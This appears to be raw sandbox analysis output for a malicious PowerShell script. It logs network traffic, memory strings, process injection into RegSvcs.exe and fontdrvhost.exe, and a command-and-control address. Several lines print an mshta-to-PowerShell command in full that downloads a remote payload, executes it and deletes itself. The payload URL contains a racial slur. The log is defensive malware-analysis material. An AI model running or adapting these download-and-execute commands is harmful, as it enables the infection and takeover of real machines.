Source: global traffic	HTTP traffic detected: GET ///////nigger.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: hot7jan.blogspot.com
Source: global traffic	HTTP traffic detected: GET /!api/2.0/snippets/nippleskakulcha/xq8pnq/f9259294d6c36acaa3a405307dfd0b2eee933c4b/files/7jan.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: hot7jan.blogspot.com
Source: global traffic	DNS traffic detected: DNS query: bitbucket.org

Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bitbucket.org
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://blogspot.l.googleusercontent.com
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hot7jan.blogspot.com
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2633925451.0000026C398C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.11.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: fontdrvhost.exe, 00000010.00000002.2425796582.00000000030AC000.00000004.00000010.00020000.00000000.sdmp, fontdrvhost.exe, 00000011.00000002.2383025146.00000000030AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf
Source: fontdrvhost.exe, 00000011.00000002.2383025146.00000000030AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf?
Source: fontdrvhost.exe, 00000010.00000002.2425796582.00000000030AC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlfx
Source: powershell.exe, 00000000.00000002.2633925451.0000026C398C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BE961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A251D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: powershell.exe, 00000013.00000002.2637107952.00000259BECB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000013.00000002.2637107952.00000259BEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2637107952.00000259BECB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2FDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 00000000.00000002.2633925451.0000026C39AE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000013.00000002.2637107952.00000259BEB82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A29D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf
Source: mshta.exe, 0000001C.00000003.2650742069.000001CC25CD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdf)
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A298A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com///////nigger.pdfX
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hot7jan.blogspot.com/atom.xml
Source: powershell.exe, 00000000.00000002.3064090133.0000026C4AABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000001A.00000002.2691050205.00000260A2FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2691050205.00000260A2F92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867

Source: Yara match	File source: 16.3.fontdrvhost.exe.59a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.fontdrvhost.exe.5780000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.fontdrvhost.exe.5780000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.fontdrvhost.exe.5780000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontdrvhost.exe PID: 5808, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C754E0 NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,memset,RtlGetVersion,GetCurrentProcess,OpenProcess,CloseHandle,lstrcmpiW,OpenProcess,CloseHandle,free,	5_2_05C754E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7B28B GetCurrentProcess,NtQueryInformationProcess,	5_2_05C7B28B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C751A4 NtQueryInformationProcess,	5_2_05C751A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C77754 GetProcAddress,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,OpenProcess,GetProcessImageFileNameW,K32GetProcessImageFileNameW,CloseHandle,free,	5_2_05C77754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C774D3 GetModuleFileNameW,RtlInitUnicodeString,NtOpenFile,	5_2_05C774D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C773ED IsBadReadPtr,malloc,GetCurrentProcess,NtUnmapViewOfSection,VirtualAlloc,GetLastError,NtSetInformationFile,Sleep,free,NtClose,	5_2_05C773ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C788F1 NtQueryInformationProcess,	5_2_05C788F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA3134 NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,	5_2_05CA3134

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0196A048	5_2_0196A048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0196A038	5_2_0196A038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01965D90	5_2_01965D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01965DC0	5_2_01965DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C78E79	5_2_05C78E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C73000	5_2_05C73000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7440E	5_2_05C7440E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7AC20	5_2_05C7AC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA3FD2	5_2_05CA3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0652A070	5_2_0652A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028AA048	6_2_028AA048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A3A5C	6_2_028A3A5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028AA038	6_2_028AA038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A1F14	6_2_028A1F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A5D90	6_2_028A5D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_028A5DC0	6_2_028A5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_05CDA070	6_2_05CDA070

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7033c19e-5841-2ad059-6fd8187c45ce}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\atomxml.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 912
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 784
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 916
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:vje=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(vje[2])[vje[0]](vje[1], 0, true);close();vfx=new ActiveXObject('Scripting.FileSystemObject');vfx.DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 912	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 916	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 784	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 788	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C684 push eax; iretd	5_2_05C7C685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C68C push cs; retf 0000h	5_2_05C7C705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C740 push ds; retf	5_2_05C7C741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C74C push esi; retf	5_2_05C7C74D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C679 pushad ; iretd	5_2_05C7C681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C714 push eax; retf 0000h	5_2_05C7C715
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C73C push es; retf	5_2_05C7C73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA3FD2 push edi; iretd	5_2_05CA42D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA49D1 push es; iretd	5_2_05CA4D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CAABFC push esp; iretd	5_2_05CAABFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA4FF5 push edx; iretd	5_2_05CA4FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CAB886 push cs; retf	5_2_05CAB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05E081BB push ecx; retf	5_2_05E082F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA7797 push ebx; retf	5_2_05CA779E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA435F push cs; retf	5_2_05CA43A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA5760 push edi; ret	5_2_05CA5761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CAA377 pushad ; retf	5_2_05CAA378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA990A push ecx; retf	5_2_05CA9916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA7503 push edx; ret	5_2_05CA7504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_04FF58A5 push 0000002Eh; iretd	6_2_04FF58A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_04FF306A push esi; iretd	6_2_04FF30BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_05C95507 push esp; retf	6_2_05C95509
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 16_3_00F720EA push esi; iretd	16_3_00F7213A
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 16_3_00F74925 push 0000002Eh; iretd	16_3_00F74928
